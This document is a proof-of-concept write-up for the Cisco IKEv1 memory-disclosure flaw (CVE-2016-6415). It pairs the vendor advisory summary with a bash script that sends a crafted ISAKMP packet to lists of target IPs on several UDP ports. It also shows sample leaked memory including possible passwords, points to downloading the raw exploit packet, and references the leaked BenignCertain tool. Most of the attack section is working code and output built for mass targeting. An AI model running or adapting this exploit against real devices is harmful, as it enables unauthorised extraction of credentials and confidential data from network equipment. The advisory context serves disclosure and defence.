Summary
A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to retrieve memory contents, which could lead to the disclosure of confidential information.The vulnerability is due to insufficient condition checks in the part of the code that handles IKEv1 security negotiation requests. An attacker could exploit this vulnerability by sending a crafted IKEv1 packet to an affected device configured to accept IKEv1 security negotiation requests. A successful exploit could allow the attacker to retrieve memory contents, which could lead to the disclosure of confidential information.
Cisco will release software updates that address this vulnerability. There are no workarounds that address this vulnerability.
This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1
Poc
# [+] ---- Fingerprint: ---- [+]
# cisco pix
# cisco pix 6
# cisco pix 7
#
# 500/udp open isakmp udp-response Cisco VPN Concentrator 3000 4.0.7
# Cisco Systems, Inc./VPN 3000 Concentrator Version 4.7.2.L built by vmurphy on Jun 11 2007 14:07:29
# Vendor: Cisco Systems, Inc.
# Cisco Systems, Inc. 12.2
# Cisco Systems, Inc. 12.4
# Cisco Systems, Inc. 15.5
# Cisco Systems pix
# Cisco VPN Concentrator
function exploit
{
if [ -z "$1" ]; then
echo "[*] please set a valid ip, ex: 8.8.8.8";
exit 0;
fi
if [ -z "$2" ]; then
echo "[*] please set a valid port, ex: 500, 4500"
fi
ip="$1"
port="$2"
echo -e "[*] sending [$payload] -> $ip: $port"
timeout 6s ./bc-id -t $ip -p $port -I "sendpacket.raw"
}
# UDP port 500
# UDP port 4500, NAT Traversal (NAT-T)
# UDP port 848, Group Domain of Interpretation (GDOI)
# UDP port 4848, GDOI NAT-T
function main
{
echo "1) exploit port 500";
echo "2) exploit port 4500";
echo "3) exploit port 848";
echo "4) exploit port 4848";
read -p "[*] please make a choice: " choice
read -p "[*] please set a valid iplist: " iplist
for ip in $(cat $iplist); do
case $choice in
1) exploit $ip 500;;
2) exploit $ip 4500;;
3) exploit $ip 848;;
4) exploit $ip 4848;;
esac
done
}
main
If you exploit the target successfully, information is as follow:
Connection established.
Opening input file sendpacket.raw....
Sending packet to 192.168.1.2....
Waiting for a response from 192.168.1.2....
Writing response to 192.168.1.2.raw....
Writing response to 192.168.1.2.hex....
Packet recieved:
3e 35 c7 07 29 df ed ef 8e 35 0e 85 0e c6 7f a3 >5..)....5......
....
....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 ............
Total bytes printed = 2540
Parsing response....
Value found is: 0x441e2300
Version matches:
None. Unknown value.
Possible passwords:
<<<<
<<<<1
<<<<
<<<<
abcde1
abcde1
tQQwQQdp
Scan Targets
If you want to scan multi targets, please try Packet Structure with your program:
1. IP/UDP/ISAKMP
2. ISAKMP == sendpacket.raw
Download sendpacket.raw
References
- https://github.com/adamcaudill/EquationGroupLeak/tree/master/Firewall/TOOLS/BenignCertain/benigncertain-v1110
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160916-ikev1
- https://tools.cisco.com/security/center/selectIOSVersion.x
- https://isakmpscan.shadowserver.org/
- http://www.freebuf.com/vuls/115207.html
- http://www.freebuf.com/news/115118.html
- https://twitter.com/marcan42/status/766346343405060096
- https://nmap.org/nsedoc/scripts/ike-version.html
- http://www.cisco.com/c/en/us/about/security-center/identify-mitigate-exploit-ikev1-info-disclosure-vuln.html
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6415
- https://github.com/rapid7/metasploit-framework/issues/7371